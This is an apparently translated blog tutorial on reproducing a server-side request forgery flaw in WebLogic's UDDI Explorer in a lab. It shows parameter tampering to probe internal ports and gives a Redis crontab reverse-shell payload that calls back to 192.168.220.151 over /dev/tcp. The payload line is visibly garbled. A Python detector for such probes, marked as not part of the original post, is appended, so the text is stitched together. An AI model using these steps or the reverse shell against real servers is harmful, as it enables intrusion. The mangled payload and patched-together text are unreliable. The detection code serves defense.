
How to reproduce the WebLogic SSRF vulnerability

2023-12-22 14:18:34

First, use Docker to build the environment. Docker installation and environment set-up tutorial: https://www.freebuf.com/sectool/252257.html

Access port 7001.

Second, vulnerability reproduction

1. Vulnerability page: /UDDI Explorer/SearchPublicRegistries.jsp

2. Select IBM and view it. It is found to be a link, so there may be SSRF.

3. Capture the request with Burp Suite and click Search.

4. Modify the link in the operator parameter.

5. Access result: visiting a nonexistent port returns "could not connect over HTTP". Accessing an existing port returns a status code. Access the intranet.

Rebound shell's payload: set 1 "with redis. * * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1 "config set dir /etc/config set dbfilename crontabsave
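Because the operator parameter is attacker-controlled and the "could not connect over HTTP" versus status-code difference lets a caller map internal ports, a defender wants to spot this traffic in the WebLogic access log. The following is an added detection example, not code from the original post; it assumes the application path /uddiexplorer/SearchPublicRegistries.jsp and uses constructed log lines.

```python
import re
from collections import defaultdict
from ipaddress import ip_address
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the original page):
# one legitimate public-registry lookup and three probes of internal targets.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Dec/2023:14:18:34 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2Fuddi.ibm.com%2Fubr%2Finquiryapi&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 5120
203.0.113.9 - - [22/Dec/2023:14:20:01 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F192.168.220.130%3A6379&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 311
203.0.113.9 - - [22/Dec/2023:14:20:02 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F192.168.220.130%3A7001&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 311
203.0.113.9 - - [22/Dec/2023:14:20:03 +0000] "GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http%3A%2F%2F127.0.0.1%3A22&rdoSearch=name&btnSubmit=Search HTTP/1.1" 200 311
"""

# Common log format: source, ident, user, [time], "METHOD target PROTO", status
REQ_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

# Assumed path of the UDDI Explorer search page (not stated in the page above).
UDDI_SEARCH_PATH = "/uddiexplorer/searchpublicregistries.jsp"


def is_internal_host(host):
    """True for loopback/private IP literals or the literal name 'localhost'."""
    try:
        return ip_address(host).is_private  # is_private also covers 127.0.0.0/8
    except ValueError:
        return host.lower() == "localhost"


def find_ssrf_probes(log_text):
    """Map source IP -> list of operator URLs that point at an internal host or
    a port other than plain HTTP/HTTPS, i.e. likely SSRF port probing."""
    probes = defaultdict(list)
    for line in log_text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith(UDDI_SEARCH_PATH):
            continue
        for op in parse_qs(target.query).get("operator", []):  # parse_qs decodes %xx
            op_url = urlsplit(op)
            host = op_url.hostname or ""
            if is_internal_host(host) or op_url.port not in (None, 80, 443):
                probes[m.group("src")].append(op)
    return dict(probes)
```

Feeding a real log through find_ssrf_probes and alerting on any source with more than a handful of distinct internal targets gives a simple port-scan-via-SSRF signal.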

